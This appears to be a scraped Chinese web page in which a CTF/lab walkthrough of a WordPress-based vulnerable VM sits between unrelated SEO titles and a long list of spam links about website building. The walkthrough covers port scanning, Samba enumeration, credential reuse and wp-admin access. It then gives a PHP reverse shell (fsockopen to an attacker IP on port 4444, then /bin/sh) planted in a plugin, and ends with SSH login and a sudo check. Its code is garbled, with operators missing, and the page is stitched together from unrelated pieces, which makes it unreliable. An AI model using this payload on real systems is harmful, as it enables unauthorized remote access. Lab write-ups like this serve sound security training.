当前位置: 首页 > news >正文

学习网站建设的步骤兴化建设局网站

学习网站建设的步骤,兴化建设局网站,网络服务提供商有哪些,个人可以做招聘网站吗准备工作 下载好靶机到本地后 VMware导入OVA 启动靶机 扫描信息 首先扫描整个C段发现主机 进一步扫描端口 从扫描结果可知#xff1a; Samba服务MySQLSSH端口网站端口 先对网站进行目录遍历 发现有wordpress网站和phpmyadmin管理系统 出现了非常多遍My name is togie.可能…准备工作 下载好靶机到本地后 VMware导入OVA 启动靶机 扫描信息 首先扫描整个C段发现主机 进一步扫描端口 从扫描结果可知 Samba服务MySQLSSH端口网站端口 先对网站进行目录遍历 发现有wordpress网站和phpmyadmin管理系统 出现了非常多遍My name is togie.可能是个重要信息 有phpmyadmin但不知道密码。 80端口没有更多收获转向Samba服务 列出分享目录的列表没有密码直接回车 访问 share$目录 首先去查看WP的配置文件一般里面会有连接数据库的密码 拿到数据库用户密码为Admin:TogieMYSQL12345^^ 再看看有没有别的信息 服务器密码为12345用户名未知 用刚刚拿到的密码去登phpmyadmin 成功但无法继续操作 去试试wordpress后台 地址/wordpress/wp-admin 复用之前的数据库账号密码试试 成功进入随后利用插件功能执行反弹shell 首先监听上线 编辑插件然后将我们的恶意shell粘贴进去 $sock fsockopen(172.31.13.169, 4444); //(监听端IP, 监听端口) $descriptorspec array( 0 $sock, 1 $sock, 2 $sock ); $process proc_open(/bin/sh, $descriptorspec, $pipes); proc_close($process); 提示更新成功接下来访问hello.php文件位置/wordpress/wp-content/plugins/hello.php kail这边也成功监听到上线 查看用户看到了togie账号结合到前面页面上重复多遍的My name is togie和 之前看到密码是12345的文件 猜测这是这位的账号密码刚好开着ssh账号试着登录。 成功上去查看sudo权限 已有sudo权限至此对靶机的渗透结束
http://www.dnsts.com.cn/news/220549.html

相关文章:

  • 电子商务网站建设的需求磁力链接 网站怎么做的
  • 北京定制网站开发公司浩森宇特北京企业做网站
  • vvic一起做网站网站系统维护中
  • 自助快速建站seo优化关键词
  • 用discuz做门户网站自己做的视频网站如何赚钱
  • 西安手机网站制作大宗贸易交易平台
  • 买模板做网站网站建设利润越来越低
  • 建设考试的报名网站商城app定制
  • html5网站 源码鼓楼网站seo搜索引擎优化
  • 企业网站托管趋势ssr网站开发
  • 上传网站到googlewordpress证书关闭
  • 站规划在网站建设中的作用机械行业营销型网站
  • 北京师范大学学风建设专题网站湛江房产网
  • 中国建设银行网站软件下载郑州建设高端网站
  • 找个人做网站的商标购买平台
  • 给企业做网站挣钱吗重庆百度提升优化
  • 北京网站推广的公司wordpress摘要字数
  • 营口网站建设价格全网推广平台有哪些
  • 电商网站的制作流程怎么做网站收录
  • 南昌做网站需要多少钱大型网页游戏有哪些
  • 网站建设广告词建网站需要什么资料
  • 建立网站需要什么硬件石狮建设银行网站
  • 如何建自己的个人网站wordpress 域名邮箱
  • 网站问卷调查怎么做如何改变网站首页栏目
  • 一个网站做两个优化可以做吗做办公设备网站
  • 响应式全屏网站怎样做外贸
  • 大同市建设工程招标投标网站燕莎网站建设
  • 高清的网站建设境外电商做的什么平台
  • 怎么找人帮做网站免费制作logo的软件
  • 网站文字重叠效果中国建设银行官方网站2018年年报